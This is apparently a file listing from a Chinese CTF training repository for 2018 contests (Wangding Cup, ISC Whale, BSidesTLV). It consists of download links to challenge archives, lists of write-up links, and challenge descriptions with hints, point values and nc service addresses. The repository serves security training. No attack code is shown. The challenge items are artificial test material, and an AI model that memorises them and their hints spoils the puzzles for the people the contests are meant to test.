--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Pwn/Fgo_28546b2f3331882a170b674edca6e90a.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Pwn/easyFMT_21c6ffc902dca96d4ddcd558dcaa3153.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Pwn/easyFMT_21c6ffc902dca96d4ddcd558dcaa3153.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Pwn/hvm_9d671d15efb43cd3909628e92b8f69c4.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Pwn/hvm_9d671d15efb43cd3909628e92b8f69c4.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Pwn/memffle_67804a75bcf59325a5c8d5dc60431f0f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Pwn/memffle_67804a75bcf59325a5c8d5dc60431f0f.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/README.md:
--------------------------------------------------------------------------------
 1 | ### Writeup
 2 | 
 3 | - [【2018年 网鼎杯CTF 第二场】红日安全-网鼎杯WriteUp](https://xz.aliyun.com/t/2619) 
 4 | - [【2018年 网鼎杯CTF 第二场】部分 writeup](https://xz.aliyun.com/t/2614) 
 5 | - [【2018年 网鼎杯CTF 第二场】二叉树 writeup](https://xz.aliyun.com/t/2616) 
 6 | - [CTF-i春秋网鼎杯第二场misc部分writeup](https://www.cnblogs.com/qiaoyifan/p/9523988.html) 
 7 | - [网鼎杯网络安全大赛–第二场Writeup](https://www.dafsec.org/150.html) 
 8 | - [网鼎杯第二场wp](https://www.o2oxy.cn/1688.html) 
 9 | - [网鼎杯第二场Reverse](https://www.52pojie.cn/thread-786790-1-1.html) 
10 | - [“网鼎杯”ISEC团队WriteUp](https://mp.weixin.qq.com/s/OjI7NZ4ocREfDOKuQHNdLw) 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Re/RUA!_142924f1ec3c9ebe751c9452bcd2086b.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Re/RUA!_142924f1ec3c9ebe751c9452bcd2086b.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Re/game_6d258173d802bcc79f3d7f68ad59df2a.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Re/game_6d258173d802bcc79f3d7f68ad59df2a.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Re/give_a_try_f0be695eb8ad4478e793e6a488303a10.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Re/give_a_try_f0be695eb8ad4478e793e6a488303a10.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Re/martricks_6b64ac3e3a3e48a93eeadfca0f70aeb1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Re/martricks_6b64ac3e3a3e48a93eeadfca0f70aeb1.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Web/wafUpload.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Web/wafUpload.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Crypto/Not_only_base_92b8361311cc8b4aa937aafc75ac1b3d.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Crypto/Not_only_base_92b8361311cc8b4aa937aafc75ac1b3d.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Crypto/hafuhafu_499dfea665100a3a0d9fc00c641dccc6.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Crypto/hafuhafu_499dfea665100a3a0d9fc00c641dccc6.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Crypto/track_hacker_a187a5426e14528bb03447ed1cff1bac.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Crypto/track_hacker_a187a5426e14528bb03447ed1cff1bac.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Misc/Unpleasant_music_f70bde32f810e516430ef87b34e7cb58.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Misc/Unpleasant_music_f70bde32f810e516430ef87b34e7cb58.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Misc/dewas_183a396cf9e027818694af487d562f82.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Misc/dewas_183a396cf9e027818694af487d562f82.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Misc/mirror_9071944e448951316e8a5e90997d2397.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Misc/mirror_9071944e448951316e8a5e90997d2397.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Pwn/note2_e5c1fd9f2122f743c9e07615e4e0d86b.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Pwn/note2_e5c1fd9f2122f743c9e07615e4e0d86b.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Pwn/note_7577feb869f21800282474553eb5a578.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Pwn/note_7577feb869f21800282474553eb5a578.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Pwn/pesp_304ba4d803e7c5367dce051409a80394.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Pwn/pesp_304ba4d803e7c5367dce051409a80394.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Pwn/soEasy_d8e9ec3653f60c1993d4c2f0cfe324e2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Pwn/soEasy_d8e9ec3653f60c1993d4c2f0cfe324e2.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | - [【2018年 网鼎杯CTF 第三场】Web 题解)](https://xz.aliyun.com/t/2648) 
4 | - [网鼎杯第三场Web部分WriteUp](http://www.lovei.org/archives/wangdingzhuque.html) 
5 | - [网鼎杯第三场wp](https://www.o2oxy.cn/1753.html) 
6 | - [网鼎杯第三场Writeup](http://www.heavensec.org/index.php/1851.html) 
7 | - [网鼎杯第三场的简单pwn](http://sayhi2urmom.top/2018/08/27/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%89%E5%9C%BA%E7%9A%84%E7%AE%80%E5%8D%95pwn/) 
8 | - [网鼎杯第三场部分WriteUp](http://www.admintony.com/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%89%E5%9C%BA%E9%83%A8%E5%88%86WriteUp.html) 
9 | - [网鼎杯writeup-护网先锋](https://github.com/hongriSec/CTF-Training/blob/master/2018/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC3%E5%9C%BA/网鼎杯writeup-护网先锋.pdf) 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Re/I_like_pack_aa64e41f373819568e4ceeff58b8eb20.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Re/I_like_pack_aa64e41f373819568e4ceeff58b8eb20.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Re/babyre_bee79960d84e07f9e8c47d35e5b79fed.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Re/babyre_bee79960d84e07f9e8c47d35e5b79fed.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Re/simpleSMC_34a6f5718d14a7537ec1dd00fa0f832d.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Re/simpleSMC_34a6f5718d14a7537ec1dd00fa0f832d.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/Re/最好的语言_87b0f5f08d1bfc5681c580e3670f8601.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/Re/最好的语言_87b0f5f08d1bfc5681c580e3670f8601.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第3场/网鼎杯writeup-护网先锋.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第3场/网鼎杯writeup-护网先锋.pdf


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/apl_757b57aab7fdc7a2cf0808836cb1ec39.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/apl_757b57aab7fdc7a2cf0808836cb1ec39.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/number_d274d3c43a1b6ab7875f4c06542d3d3a.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/number_d274d3c43a1b6ab7875f4c06542d3d3a.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/shanghai_09dbaf0a4a83b7ebfd08ae0fe85d9d05.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/shanghai_09dbaf0a4a83b7ebfd08ae0fe85d9d05.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/shellcoder_586854eb4f0df7001ce33e762af50643.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/shellcoder_586854eb4f0df7001ce33e762af50643.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/shenyue2_f5da6843ba2862246210199bf8c584e7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/shenyue2_f5da6843ba2862246210199bf8c584e7.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Crypto/shenyue_8a90cab30c96e7e827e3585c2be1ed8a.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Crypto/shenyue_8a90cab30c96e7e827e3585c2be1ed8a.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Misc/welcome.txt:
--------------------------------------------------------------------------------
1 | hint: use gpu


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Misc/welcome_3d8b520a2dc416e182d8592e9a1aaa76.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Misc/welcome_3d8b520a2dc416e182d8592e9a1aaa76.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Misc/xiaojiejie.txt:
--------------------------------------------------------------------------------
1 | hint: known bmp stego algorithm/tools


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Misc/xiaojiejie_c617168167b7c041bc98d683597594bb.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Misc/xiaojiejie_c617168167b7c041bc98d683597594bb.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Misc/双色块_99268fd14c1e51d3ef11a90c2943a2c5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Misc/双色块_99268fd14c1e51d3ef11a90c2943a2c5.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Pwn/impossible_1d1a9f4b730de9a44fd865843fa737f3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Pwn/impossible_1d1a9f4b730de9a44fd865843fa737f3.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Pwn/ipowtn_e912ff8757c402c8afcc362148836c6c.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Pwn/ipowtn_e912ff8757c402c8afcc362148836c6c.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Pwn/ipowtn_reborn_caebf086efc862a3141e6c696ef499a8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Pwn/ipowtn_reborn_caebf086efc862a3141e6c696ef499a8.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/README.md:
--------------------------------------------------------------------------------
 1 | ### Writeup
 2 | 
 3 | - [ 2018网鼎杯第四场Web题解](https://mochazz.github.io/2018/09/01/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E5%9B%9B%E5%9C%BA/) 
 4 | - [【2018年 网鼎杯CTF 第四场】Crypto：APL](https://xz.aliyun.com/t/2666) 
 5 | - [【2018年 网鼎杯CTF 第四场】 RE ： dalao](https://xz.aliyun.com/t/2665) 
 6 | - [网鼎杯第四场wp](https://www.o2oxy.cn/1817.html) 
 7 | - [网鼎杯第四场Some Web Writeup](https://www.cnblogs.com/iamstudy/articles/wangding_4th_game_web_writeup.html) 
 8 | - [网鼎杯 第四场 部分WriteUp](https://www.anquanke.com/post/id/158386) 
 9 | - [CTF-i春秋网鼎杯第四场部分writeup](https://www.cnblogs.com/qiaoyifan/p/9558261.html) 
10 | - [网鼎杯第四场web题comment_writeup](https://www.dafsec.org/197.html) 
11 | - [网鼎杯第四场shenyue2-wp](https://xz.aliyun.com/t/2687) 
12 | - [从网鼎杯(第四场)的两题MIPS PWN谈起](https://www.anquanke.com/post/id/158673) 
13 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Re/chaoyang_8eb13126e21561d48dc209a9c88dfc43.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Re/chaoyang_8eb13126e21561d48dc209a9c88dfc43.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Re/compenc_58b462e2a4449a6bd5c10913931c9b58.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Re/compenc_58b462e2a4449a6bd5c10913931c9b58.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Re/dalao_90f768a442eb708749585188c3995cc0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Re/dalao_90f768a442eb708749585188c3995cc0.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Web/NoWafUpload.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Web/NoWafUpload.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第4场/Web/comment.php.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第4场/Web/comment.php.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯线下赛/AWD.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯线下赛/AWD.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯线下赛/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | - [网鼎杯半决赛 pwn wp](https://www.jianshu.com/p/7e44cd4d5f7f) 
4 | - [网鼎杯线下赛](https://www.jianshu.com/p/a464b009947b) 
5 | - [[网鼎杯线下] web && droopy 靶场](https://www.jianshu.com/p/6e460b4906c0) 
6 | - [2018-网鼎杯 pwn(部分线上+线下）](https://www.jianshu.com/p/cc9d09a3f65f) 
7 | 


--------------------------------------------------------------------------------
/2018/BesideTLV/BesideTLV.docm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/BesideTLV/BesideTLV.docm


--------------------------------------------------------------------------------
/2018/BesideTLV/README.md:
--------------------------------------------------------------------------------
1 | ## BesideTLV
2 | 
3 | - [BesideTLV](https://www.vulnhub.com/entry/bsidestlv-2018-ctf,250/)
4 | 


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/Brsa.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/Brsa.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/SRSA.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/SRSA.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/Up-Add.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/Up-Add.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/rsaboy.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/rsaboy.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Crypto/题目.md:
--------------------------------------------------------------------------------
 1 | ## Up&Add
 2 | 
 3 | ### 150
 4 | 
 5 | 答案格式whaleCTF{xxx}
 6 | 观察密文进行解密：wDhlpGvy{raJz_cmIL_dUvq_XJ}
 7 | 
 8 | ## RSA_BOY
 9 | 
10 | ### 200
11 | 
12 | RSA而已不需要分解吧~
13 | 链接：<https://pan.baidu.com/s/1SqTY3pFbNQJL4pAnZCSTsw> 密码：s6oj
14 | 
15 | ## SRSA
16 | 
17 | ### 200
18 | 
19 | 一样的不一定是好的
20 | 
21 | ## Brsa
22 | 
23 | ### 300
24 | 
25 | 经典的RSA吗？好像指数不对啊！威廉拉宾了解一下~
26 | 答案格式：whaleCTF{xxx},xxx为解密内容


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/PlainZIP.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/PlainZIP.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/Transparentbrain.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/Transparentbrain.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/WaveSong.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/WaveSong.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/彩虹糖.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/彩虹糖.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Misc/题目.md:
--------------------------------------------------------------------------------
 1 | ## Transparentbrain
 2 | 
 3 | ### 280
 4 | 
 5 | 脑袋中总是能绽放五彩斑斓的花朵，但是要注意，思路总是有先有后的。
 6 | 答案格式whaleCTF{xxx}
 7 | 
 8 | ## PlainZIP
 9 | 
10 | ### 300
11 | 
12 | 歌词是这么说的，你知道了我的心，当然就能打开我的心扉了。
13 | 
14 | ## 彩虹糖
15 | 
16 | ### 300
17 | 
18 | 彩虹糖公司的机器出了问题，不断的在他们的宣传海报里插入彩虹糖，最后公司发现，插入的竟然是公司机密，请帮助他们找到所有机密。答案格式whaleCTF{xxx}
19 | 
20 | ## WaveSong
21 | 
22 | ### 350
23 | 
24 | 歌是好歌，就是声音好像怪怪的有延时···据说歌里还有一个二维码~
25 | 链接：<https://pan.baidu.com/s/1Eqpe_cJ8Q_2SkxcRuE4e8w> 密码：ncdd
26 | 答案格式whaleCTF{xxx}


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/BOF.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/BOF.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/babyFMT.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/babyFMT.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/babyPWN.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/babyPWN.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/data_POL.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/data_POL.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Pwn/题目.md:
--------------------------------------------------------------------------------
 1 | ## babyPWN
 2 | 
 3 | ### 150
 4 | 
 5 | 格式问题
 6 | nc 39.107.92.230 10001
 7 | 答案格式whaleCTF{xxx}
 8 | 
 9 | ## BOF
10 | 
11 | ### 260
12 | 
13 | 你知道BOF吗？
14 | nc 39.107.92.230 10002
15 | 答案格式whaleCTF{xxx}
16 | 
17 | ## babyFMT
18 | 
19 | ### 280
20 | 
21 | nc 39.107.92.230 10003
22 | 答案格式whaleCTF{xxx}
23 | 
24 | ## data_POL
25 | 
26 | ### 300
27 | 
28 | 某天警局接到了报警，据说某个罪犯的记录被留到了学校的应用程序中，可是老师们和警官们都没有办法破解这个系统。你能不能帮助警长破解这个系统呢？
29 | nc 39.107.92.230 10004
30 | 答案格式：whaleCTF{xxx}


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/README.md:
--------------------------------------------------------------------------------
 1 | 比赛时间：开放时间：9月3日~9月6日10:00AM
 2 | 
 3 | 比赛地址：http://daka.whaledu.com:9090/
 4 | 
 5 | ### Writeup
 6 | 
 7 | - [ISC2018 魔塔线上赛 WP](http://www.whaledu.com/article/23) 
 8 | - [ISC 2018 蓝鲸魔塔线上赛-pwn](https://blog.csdn.net/w12315q/article/details/82353495) 
 9 | 
10 | 


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/PYMD5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/PYMD5.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/XTEAPY.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/XTEAPY.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/crc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/crc.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/背叛天主.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/背叛天主.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Reverse/题目.md:
--------------------------------------------------------------------------------
 1 | ## CRC
 2 | 
 3 | ### 200
 4 | 
 5 | 这是个CRC的欧皇游戏~非酋就不要凑热闹了~Orz！什么也能肝？？
 6 | 答案格式whaleCTF{xxx}
 7 | 
 8 | ## PY&MD5
 9 | 
10 | ### 260
11 | 
12 | 我还是喜欢强硬点的~
13 | 答案格式whaleCTF{xxx}
14 | 
15 | ## 背叛天主
16 | 
17 | ### 300
18 | 
19 | 吕马再次组织了天主信徒信奉耶稣！上帝派给你个任务，请把吕马的魔盒打开找到击溃他的方法。
20 | 链接：<https://pan.baidu.com/s/1tm0UkDYQpczggnqI6FXL0w> 密码：yp1c
21 | 答案格式whaleCTF{xxx}
22 | 
23 | ## XTEAPY
24 | 
25 | ### 400
26 | 
27 | 再逆一下试试~
28 | 答案格式whaleCTF{xxx}
29 | 密文是：['0x319ccd94L', '0xe73d6466L']


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸文件管理系统.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸文件管理系统.zip


--------------------------------------------------------------------------------
